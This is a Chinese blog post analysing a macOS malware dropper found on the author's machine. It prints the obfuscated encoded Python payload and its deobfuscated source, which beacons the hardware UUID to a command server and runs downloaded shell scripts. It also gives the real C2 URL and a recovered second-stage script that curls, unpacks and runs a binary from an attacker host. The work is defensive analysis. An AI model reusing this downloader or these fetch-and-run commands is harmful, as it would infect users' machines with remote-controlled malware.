Mac App 破解之路八 病毒程序分析
本人使用MacBooster 7 扫出了几个未知程序.
JMJ56 这个程序. 在finder中打开发现是一个shell脚本 调用了python
9NKb0 就是python脚本使用. 只不过是编译之后的 pyc二进制文件.
使用 https://tool.lu/pyc/ 在线反编译工具, 将其反编译后,得到了如下代码:
import zlib
import base64
exec zlib.decompress(base64.b64decode('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'))
将exec 改成 print 后 得到源码:
import time
YCs=globals
YCQ=None
YCX=Exception
YCU=chr
YCf=ord
YCq=True
YCk=str
YCN=int
YCD=len
YCI=open
YCM=False
YCF=float
YCu=OSError
YCE=enumerate
Ycw=time.time
Ycb=time.sleep
import uuid
YcB=uuid.uuid4
import os
Yci=os.path
YcA=os.remove
Ycl=os.getenv
YCc=os.mkdir
import sys
YCp=sys.path
YCn=sys.argv
import platform
YCS=platform.mac_ver
import urllib2
YCL=urllib2.Request
YCy=urllib2.urlopen
import shelve
YCV=shelve.DbfilenameShelf
import base64
YCg=base64.b64decode
YCp.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
YCa=objc.loadBundleFunctions
from subprocess import Popen,PIPE
from Foundation import NSBundle
YCr=NSBundle.bundleWithIdentifier_
def YcP():
YcC=YCr('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
YCa(YcC,YCs(),Ycp)
def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,YCQ,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass
def YcH(YcF):
try:
Ycn=YCL(YcF)
YcS=YCy(Ycn)
YcL=YcS.read()
return YcL
except YCX as twwAy:
pass
def Ycz(mOoCz):
if Ycy:
return YcT(mOoCz)
return mOoCz
def YcT(bmtzB):
return YCg(YCg("".join([YCU(YCf(x)-1)for x in YCg(bmtzB)]))[::-1])
Ycy=YCq
class Ycx:
def __init__(Ycq):
YcP()
YcV=Ycz("UVUyU1ZsNTZTV04+")
Ycg=Ycz("TkVselpvbDZiWE9wWGtPTg==")
Yca=Ycz("UVUyU1hrS0hObVdwVm1pW1NVbVVbWW1IY1hPcWNGZVY=")
Ycr=Ycz("UVdHSVtHU2xXM0d1T1VLalNGNllYVjU2VjNXNlNuMmtiWHlJV0I+Pg==")
Ycs=Ycz("TkVtSVhoPj4=")
YcQ=Ycz("ZW1LSlhoPj4=")
YcX=Ycz("UVZXVltCPj4=")
YcU=Ycz("UVdtVltCPj4=")
Ycf=Ycz("UVUyQ1pZcDJSM1d4UFZPa2VHSntVQj4+")
Ycq.LyPiI=Ycz("UVZHWltCPj4=")
Ycq.bHJIV=Ycz("UVUyQ1pZcDZiWEt4VGtLTg==")
Ycq.RXatE=Ycz("UVhldVtSPj4=")
Ycq.jWCqZ=Ycz("UVhldltSPj4=")
Ycq.axruV=Ycz("UVZse1hSPj4=")
Ycq.PzAcW=Ycz("ZldxWlpoPj4=")
Yck=Ycz("UVZHRlVVU0tTRjk+")
Ycq.FlQzO=Ycz("UVUyU1VrR2tTRjE+")
Ycq.TdttD=Ycz("UVUyNFtCPj4=")
Ycq.skrNG=Ycz("UVhPRlVoPj4=")
Ycq.BnAQf=YCk(YcB()).split('-')[-1][2:6]
YcN=Ycl(YcV)
if YcN in[Ycg,YCQ]:
YcN=""
if Ycq.YcG():
Ycq.iQbym=Ycq.YcJ(Ycq.YcO(YcN,Ycr))
YcD=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),YcQ))
YcI=Ycq.YcJ(YcU)
else:
Ycq.iQbym=Ycq.YcJ(Ycq.YcO(YcN,Yca))
YcD=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),Ycs))
YcI=Ycq.YcJ(YcX)
Ycq.tJTBy=Ycq.YcJ(Ycf)
Ycq.tvkWA=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),Ycq.YcJ(YcI)))
try:
Ycq.CRAQs=YCV(Ycq.YcJ(YcD))
except YCX as twwAy:
return
Ycq.axdjg=YCN(Yck)
def Ycm(Ycq):
Ycq.Yco()
if Ycq.Yce():
Ycq.Ych()
Ycq.CRAQs.close()
def Ych(Ycq):
if YCD(Ycq.CRAQs.get(Ycq.LyPiI,''))>0:
Ycq.YcR(Ycq.CRAQs[Ycq.LyPiI].strip())
else:
try:
f=YCI(Ycq.YcJ(Ycq.tvkWA))
YcM=f.readline()
f.close()
Ycq.CRAQs[Ycq.LyPiI]=YcM.strip()
if YCD(Ycq.CRAQs.get(Ycq.LyPiI,''))>0:
Ycq.YcR(Ycq.CRAQs[Ycq.LyPiI].strip())
else:
pass
except YCX as twwAy:
return
def YcR(Ycq,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),Ycq.PzAcW,YCS()[0])
YcL=YcH(YcF)
if not YcL:
return
if YCD(YcL)>10:
Ycq.Ycv(YcL)
def Ycv(Ycq,ToLzn):
Ycq.Ycj(ToLzn)
Ycq.Ycd()
try:
Ycb(2)
YcA(Ycq.YcJ(Ycq.tJTBy))
except YCX as twwAy:
pass
def Ycj(Ycq,ToLzn):
YcL=YcH(ToLzn)
try:
f=YCI(Ycq.YcJ(Ycq.tJTBy),Ycz(Ycq.TdttD))
f.write(YcL)
f.close()
except YCX as twwAy:
pass
def Ycd(Ycq):
p=Popen([Ycq.bHJIV,Ycq.YcJ(Ycq.tJTBy)],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate()
def YcG(Ycq):
if YCD(YCn)>1:
if YCn[1]==Ycq.axruV:
return YCq
return YCM
def Yce(Ycq):
if YCN(Ycq.CRAQs.get(Ycq.RXatE,0))==0:
Ycq.CRAQs[Ycq.RXatE]=Ycw()
Ycq.CRAQs[Ycq.jWCqZ]=Ycw()
return YCq
if YCN(Ycq.CRAQs.get(Ycq.jWCqZ,0))>0:
if Ycw()-YCF(Ycq.CRAQs[Ycq.jWCqZ])<Ycq.axdjg:
return YCM
Ycq.CRAQs[Ycq.jWCqZ]=Ycw()
return YCq
def Yco(Ycq):
if not Yci.isdir(Ycq.YcJ(Ycq.iQbym)):
try:
YCc(Ycq.YcJ(Ycq.iQbym),YCN(Ycq.FlQzO))
except YCu as xQowg:
pass
except YCX as twwAy:
pass
def YcJ(Ycq,DngPJ):
return ''.join([YCU(YCf(JeEmF)^YCf(Ycq.BnAQf[JAYHL%YCD(Ycq.BnAQf)]))for JAYHL,JeEmF in YCE(YCk(DngPJ))])
def YcO(Ycq,*args):
Ycu=Ycq.skrNG
try:
Ycu=YCN(Ycu)
except YCX as twwAy:
Ycu=YCN(Ycz(Ycq.skrNG))
return YCU(Ycu).join(args)
YcE=Ycx()
YcE.Ycm()
看到这样的代码,有点尴尬, 混淆过后的python真牛逼. 手动优化一番后:
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64 sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle def YcP():
YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
objc.loadBundleFunctions(YcC,globals(),Ycp) def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass
def YcH(YcF):
try:
Ycn=urllib2.Request(YcF)
YcS=urllib2.urlopen(Ycn)
YcL=YcS.read()
return YcL
except Exception as twwAy:
pass
def Ycz(mOoCz):
if True:
return YcT(mOoCz)
return mOoCz def YcT(bmtzB):
return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1]) class Ycx:
def __init__(self):
YcP()
YcV=Ycz("UVUyU1ZsNTZTV04+")
Ycg=Ycz("TkVselpvbDZiWE9wWGtPTg==")
Yca=Ycz("UVUyU1hrS0hObVdwVm1pW1NVbVVbWW1IY1hPcWNGZVY=")
Ycr=Ycz("UVdHSVtHU2xXM0d1T1VLalNGNllYVjU2VjNXNlNuMmtiWHlJV0I+Pg==")
Ycs=Ycz("TkVtSVhoPj4=")
YcQ=Ycz("ZW1LSlhoPj4=")
YcX=Ycz("UVZXVltCPj4=")
YcU=Ycz("UVdtVltCPj4=")
Ycf=Ycz("UVUyQ1pZcDJSM1d4UFZPa2VHSntVQj4+")
self.LyPiI=Ycz("UVZHWltCPj4=")
self.bHJIV=Ycz("UVUyQ1pZcDZiWEt4VGtLTg==")
self.RXatE=Ycz("UVhldVtSPj4=")
self.jWCqZ=Ycz("UVhldltSPj4=")
self.axruV=Ycz("UVZse1hSPj4=")
self.PzAcW=Ycz("ZldxWlpoPj4=")
Yck=Ycz("UVZHRlVVU0tTRjk+")
self.FlQzO=Ycz("UVUyU1VrR2tTRjE+")
self.TdttD=Ycz("UVUyNFtCPj4=")
self.skrNG=Ycz("UVhPRlVoPj4=")
self.BnAQf=str(uuid.uuid4()).split('-')[-1][2:6]
YcN=os.getenv(YcV)
if YcN in[Ycg,None]:
YcN=""
if self.YcG():
self.iQbym=self.YcJ(self.YcO(YcN,Ycr))
YcD=self.YcJ(self.YcO(self.YcJ(self.iQbym),YcQ))
YcI=self.YcJ(YcU)
else:
self.iQbym=self.YcJ(self.YcO(YcN,Yca))
YcD=self.YcJ(self.YcO(self.YcJ(self.iQbym),Ycs))
YcI=self.YcJ(YcX)
self.tJTBy=self.YcJ(Ycf)
self.tvkWA=self.YcJ(self.YcO(self.YcJ(self.iQbym),self.YcJ(YcI)))
try:
self.CRAQs=shelve.DbfilenameShelf(self.YcJ(YcD))
except Exception as twwAy:
return
self.axdjg=int(Yck)
def Ycm(self):
self.Yco()
if self.Yce():
self.Ych()
self.CRAQs.close()
def Ych(self):
if len(self.CRAQs.get(self.LyPiI,''))>0:
self.YcR(self.CRAQs[self.LyPiI].strip())
else:
try:
f=open(self.YcJ(self.tvkWA))
YcM=f.readline()
f.close()
self.CRAQs[self.LyPiI]=YcM.strip()
if len(self.CRAQs.get(self.LyPiI,''))>0:
self.YcR(self.CRAQs[self.LyPiI].strip())
else:
pass
except Exception as twwAy:
return
def YcR(self,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),self.PzAcW,platform.mac_ver()[0])
YcL=YcH(YcF)
if not YcL:
return
if len(YcL)>10:
self.Ycv(YcL)
def Ycv(self,ToLzn):
self.Ycj(ToLzn)
self.Ycd()
try:
time.sleep(2)
os.remove(self.YcJ(self.tJTBy))
except Exception as twwAy:
pass
def Ycj(self,ToLzn):
YcL=YcH(ToLzn)
try:
f=open(self.YcJ(self.tJTBy),Ycz(self.TdttD))
f.write(YcL)
f.close()
except Exception as twwAy:
pass
def Ycd(self):
p=Popen([self.bHJIV,self.YcJ(self.tJTBy)],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate()
def YcG(self):
if len(sys.argv)>1:
if sys.argv[1]==self.axruV:
return True
return False
def Yce(self):
if int(self.CRAQs.get(self.RXatE,0))==0:
self.CRAQs[self.RXatE]=time.time()
self.CRAQs[self.jWCqZ]=time.time()
return True
if int(self.CRAQs.get(self.jWCqZ,0))>0:
if time.time()-float(self.CRAQs[self.jWCqZ])<self.axdjg:
return False
self.CRAQs[self.jWCqZ]=time.time()
return True
def Yco(self):
if not os.path.isdir(self.YcJ(self.iQbym)):
try:
os.mkdir(self.YcJ(self.iQbym),int(self.FlQzO))
except OSError as xQowg:
pass
except Exception as twwAy:
pass
def YcJ(self,DngPJ):
return ''.join([chr(ord(JeEmF)^ord(self.BnAQf[JAYHL%len(self.BnAQf)]))for JAYHL,JeEmF in enumerate(str(DngPJ))])
def YcO(self,*args):
Ycu=self.skrNG
try:
Ycu=int(Ycu)
except Exception as twwAy:
Ycu=int(Ycz(self.skrNG))
return chr(Ycu).join(args) YcE=Ycx()
YcE.Ycm()
上面的代码稍微还可以看一下. 继续优化:
# -*- coding: utf-8 -*-
# @Time : 2019/8/4 8:13 PM
# @Author : dzq
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64 sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle def YcP():
YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
objc.loadBundleFunctions(YcC,globals(),Ycp) def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass def reqUrl(YcF):
try:
Ycn=urllib2.Request(YcF)
YcS=urllib2.urlopen(Ycn)
con=YcS.read()
return con
except Exception as twwAy:
pass
def Ycz(mOoCz):
if True:
return YcT(mOoCz)
return mOoCz def YcT(bmtzB):
return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1]) class Ycx:
def __init__(self):
YcP()
YcV='HOME'
Ycg='/var/root'
Ycr='Library/MacConfigStd'
Ycs='dot'
YcX='u1'
YcU='u6'
Ycf='/tmp/ix.sh'
self.bHJIV='/bin/sh'
self.axruV='cr'
self.PzAcW='mvr'
self.TdttD='w'
self.BnAQf='e2f4' if self.YcG():
self.iQbym= '/Users/dengzhongqiang/Library/MacConfigStd'
YcD= '/Users/dengzhongqiang/Library/MacConfigStd/dto'
YcI= 'u6'
else:
self.iQbym= '/Users/dengzhongqiang/Library/DataSave'
YcD= '/Users/dengzhongqiang/Library/DataSave/dot'
YcI = 'u1' self.tvkWA=self.path_join(self.iQbym, YcI) try:
self.CRAQs=shelve.DbfilenameShelf(YcD)
except Exception as twwAy:
return def Ycm(self):
self.Yco()
if self.Yce():
self.Ych()
self.CRAQs.close() def Ych(self):
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
try:
f=open('/Users/dengzhongqiang/Library/DataSave/u1')
line=f.readline()
f.close()
self.CRAQs['up']=line.strip()
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
pass
except Exception as twwAy:
return def req(self,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),'mvr',platform.mac_ver()[0])
con=reqUrl(YcF)
if not con:
return
if len(con)>10:
self.Ycv(con) def Ycv(self,url):
self.Ycj(url)
self.Ycd()
try:
time.sleep(2)
os.remove(self.YcJ('/tmp/ix.sh'))
except Exception as twwAy:
pass def Ycj(self,url):
con=reqUrl(url)
try:
f=open('/tmp/ix.sh',"w")
f.write(con)
f.close()
except Exception as twwAy:
pass def Ycd(self):
p=Popen(['bib/sh','/tmp/ix.sh'],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate() def YcG(self):
if len(sys.argv)>1:
if sys.argv[1]==self.axruV:
return True
return False
def Yce(self):
if int(self.CRAQs.get('zh',0))==0:
self.CRAQs['zh']=time.time()
self.CRAQs['zx']=time.time()
return True
if int(self.CRAQs.get('zx',0))>0:
if time.time()-float(self.CRAQs['zx'])< 82800:
return False
self.CRAQs['zx']=time.time()
return True
def Yco(self):
if not os.path.isdir('/Users/dengzhongqiang/Library/DataSave'):
try:
os.mkdir( self.iQbym,0755)
except OSError as xQowg:
pass
except Exception as twwAy:
pass def path_join(self,*args):
return '/'.join(args) YcE=Ycx()
YcE.Ycm()
# -*- coding: utf-8 -*-
# @Time : 2019/8/4 8:13 PM
# @Author : dzq
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64 sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle def YcP():
YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
objc.loadBundleFunctions(YcC,globals(),Ycp) def YcK(WTRkc):
return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
return YcK("IOPlatformUUID")
def YcW(bmtzB):
pass def reqUrl(YcF):
try:
Ycn=urllib2.Request(YcF)
YcS=urllib2.urlopen(Ycn)
con=YcS.read()
return con
except Exception as twwAy:
pass
def Ycz(mOoCz):
if True:
return YcT(mOoCz)
return mOoCz def YcT(bmtzB):
return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1]) class Ycx:
def __init__(self):
YcP() if self.YcG():
self.iQbym= '/Users/dengzhongqiang/Library/MacConfigStd'
YcD= '/Users/dengzhongqiang/Library/MacConfigStd/dto'
YcI= 'u6'
else:
self.iQbym= '/Users/dengzhongqiang/Library/DataSave'
YcD= '/Users/dengzhongqiang/Library/DataSave/dot'
YcI = 'u1' self.tvkWA=self.path_join(self.iQbym, YcI) try:
self.CRAQs=shelve.DbfilenameShelf(YcD)
except Exception as twwAy:
return def Ycm(self):
self.Yco()
if self.Yce():
self.Ych()
self.CRAQs.close() def Ych(self):
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
try:
f=open('/Users/dengzhongqiang/Library/DataSave/u1')
line=f.readline()
f.close()
self.CRAQs['up']=line.strip()
if len(self.CRAQs.get('up',''))>0:
self.req(self.CRAQs['up'].strip())
else:
pass
except Exception as twwAy:
return def req(self,jfubJ):
YcF="{}{}&{}={}".format(jfubJ,Yct(),'mvr',platform.mac_ver()[0])
con=reqUrl(YcF)
if not con:
return
if len(con)>10:
self.Ycv(con) def Ycv(self,url):
self.Ycj(url)
self.Ycd()
try:
time.sleep(2)
os.remove(self.YcJ('/tmp/ix.sh'))
except Exception as twwAy:
pass def Ycj(self,url):
con=reqUrl(url)
try:
f=open('/tmp/ix.sh',"w")
f.write(con)
f.close()
except Exception as twwAy:
pass def Ycd(self):
p=Popen(['bib/sh','/tmp/ix.sh'],stdin=PIPE,stdout=PIPE,stderr=PIPE)
p.communicate() def YcG(self):
if len(sys.argv)>1:
if sys.argv[1]=='cr':
return True
return False def Yce(self):
if int(self.CRAQs.get('zh',0))==0:
self.CRAQs['zh']=time.time()
self.CRAQs['zx']=time.time()
return True
if int(self.CRAQs.get('zx',0))>0:
if time.time()-float(self.CRAQs['zx'])< 82800:
return False
self.CRAQs['zx']=time.time()
return True
def Yco(self):
if not os.path.isdir('/Users/dengzhongqiang/Library/DataSave'):
try:
os.mkdir( self.iQbym,0755)
except OSError as xQowg:
pass
except Exception as twwAy:
pass def path_join(self,*args):
return '/'.join(args) YcE=Ycx()
YcE.Ycm()
通过调试和进一步优化,读取这段逻辑, 知道了这段恶意程序的思想:
每次开机执行这段脚本, 读取dot.db, 转换成python中的字典 data. [这里有一个时间比对, 如果时间在23个小时以内,则不请求URL
这个URL的功能就是获取ix.sh文件内容.]
然后获取这个data中up字段,如果没有up字段,就读取/Users/dengzhongqiang/Library/DataSave/u1文件内容:
是一个url, 然后请求这个URL, 如果返回的数据长度大于10, 则把这个内容写入到 /tmp/ix.sh中,
并加入可执行权限,然后执行. 执行完成之后过2秒就删除这个ix.sh脚本.
完整的请求地址是:
http://i.swiftinstaller.top/c/ci?ct=clpy&tm=1&id=7B97AA40-7A19-5F8C-B050-35A7D8D8F8B3&mvr=10.14.5
id字段是这段代码的返回值,
IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),'IOPlatformUUID',None,0)
妈个逼的, 用postman模拟请求一直返回1, 很想知道iv.sh里的内容是啥. 决定用数据恢复软件恢复一波,看能不能找回来. 看一下恶意程序的真荣.
拿到了iv.sh的内容.
#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "http://www.qaeqxa.pw/static/s3/exec6625/exec.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf func_cccc(){
sleep
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &
可以知道, 它下载了exec.tgz, 下载我执行命令下载一下这个.
wget http://www.qaeqxa.pw/static/s3/exec6625/exec.tgz
tar -xzf exec.tgz -C ./bingdu/
拿到了真正的病毒程序: xSf
这个程序隐藏的真深, 延时120秒后就删除了. 杀毒软件肯定也就找不到它了.
用杀毒软件直接扫描这个程序: 
最终找到了写病毒的人,他叫: batman
老子要报警.
Mac App 破解之路八 病毒程序分析的更多相关文章
- Mac app 破解之路
6年之前一直做过一些内存挂,脚本挂.都是比较低级的技术. 这几年期间,断断续续利用业余时间学了一些汇编的知识,当时只是想着破解游戏. 所有的黑技术都是业余自学的,没有老师可以问,只能百度和自己领悟,比 ...
- mac App 破解之路六 studio 3t
不想无限使用,直接破解到正版: 输入邮箱 名字之后 还有licence信息之后,处理函数是: this.text.getText() 很明显是你输入的licence. 然后交给父类okPress处 ...
- Mac App破解之路九 vscode插件破解
破解对象: luaide 破解目的:学习如何破解vscode插件 破解背景: vsscode用了这么多年,安装了很多插件,其中luaide插件是收费的. 说实话,100块并不贵, 我本来准备买的. ...
- MAC App破解之路十 Particle Design
这个软件破解非常简单: 修改: [PaddleStatic Yz6nrtNwF4].直接返回1 效果:
- Ios App破解之路二 JJ斗地主
前提条件: 越狱手机里, 安装了 <JJ斗地主> 使用砸壳工具clutch 下载地址: https://github.com/KJCracks/Clutch/releases dzq:~/ ...
- IOS App破解之路一 拿到appstore上的ipa
1, 在Mac电脑上的app store里搜索Apple Configurator2 并安装 2, iPhone手机连接Mac电脑 3, 登录Apple Configurator2 菜单栏, 账号 ...
- 【APP设计利器】Sketch 41 Mac中文破解版(含汉化插件)
Sketch是一款拥有美观界面和强大功能适用于所有设计师的专业矢量绘图工具.它旨在为美术设计师创造出一款更优秀的作品,不是复制品,而是提升品.Sketch简约的设计是基于无限的规模和层次的绘图空间,免 ...
- Navicat Premium Mac 12 破解(亲测可用!!!)
今天不知怎的,出于强迫症的我就是要强行搞个Navicat Premium Mac 12 破解版本. 历经了种种种种种种磨难与艰辛与火海,终于破解成功了. 因为要经常使用MySQL,使用命令行那是相当的 ...
- 破解安装 SecureCRT 7.0.2 for mac完美破解版,mac secureCRT , apple secureCRT
mac secureCRT , apple secureCRT 下载地址:http://download.csdn.net/detail/guolichun/7733069 破解安装 SecureC ...
随机推荐
- 微信小程序语音同步智能识别的实现案例
目录 一.背景 二.同声传译插件介绍 1. 微信小程序后台添加插件 2. 微信小程序启用插件 三.语音同步转换的前端实现 1.界面UI与操作 2.代码实现 四.后端SpringBoot实现语音文件上传 ...
- 02 . Nginx平滑升级和虚拟主机
Nginx虚拟主机 在真实的服务器环境,为了充分利用服务器资源,一台nginx web服务器会同时配置N个虚拟主机,这样可以充分利用服务器的资源,方便管理员的统一管理 配置nginx虚拟主机有三种方法 ...
- Java-接口(另类抽象)
1.1 特点 用interface定义 接口中所有成员变量都默认是由public static final修饰的 接口中所有方法都默认是由public abstract修饰的 接口没有构造器 接口采用 ...
- Rocket - decode - 几个问题
https://mp.weixin.qq.com/s/pMsK_E4mQrm3QXdnp7nDPQ 讨论指令解码部分遗留的几个问题. 1. 最小项与蕴含项之间的关系 参考链接: htt ...
- Python机器学习笔记:SVM(1)——SVM概述
前言 整理SVM(support vector machine)的笔记是一个非常麻烦的事情,一方面这个东西本来就不好理解,要深入学习需要花费大量的时间和精力,另一方面我本身也是个初学者,整理起来难免思 ...
- 注解@NotNull/@NotEmpty/@NotBlank
@NotNull:不能为null,但可以为empty @NotEmpty:不能为null,而且长度必须大于0 @NotBlank:只能作用在String上,不能为null,而且调用trim()后,长度 ...
- Java实现 洛谷 P1060 开心的金明
题目描述 金明今天很开心,家里购置的新房就要领钥匙了,新房里有一间他自己专用的很宽敞的房间.更让他高兴的是,妈妈昨天对他说:"你的房间需要购买哪些物品,怎么布置,你说了算,只要不超过NN元钱 ...
- Java实现 LeetCode 141 环形链表
141. 环形链表 给定一个链表,判断链表中是否有环. 为了表示给定链表中的环,我们使用整数 pos 来表示链表尾连接到链表中的位置(索引从 0 开始). 如果 pos 是 -1,则在该链表中没有环. ...
- java实现第五届蓝桥杯奇怪的分式
奇怪的分式 题目描述 上小学的时候,小明经常自己发明新算法.一次,老师出的题目是: 1/4 乘以 8/5 小明居然把分子拼接在一起,分母拼接在一起,答案是:18/45 (参见图1.png) 老师刚想批 ...
- 去摆摊吧,落魄的Java程序员
真的,我也打算去摆摊,宣传语我都想好了.沉默王二,一枚有颜值却靠才华苟且的程序员,<Web 全栈开发进阶之路>作者,CSDN 明星博主,周排名第 4,总排名 40,这数据在众多互联网大咖面 ...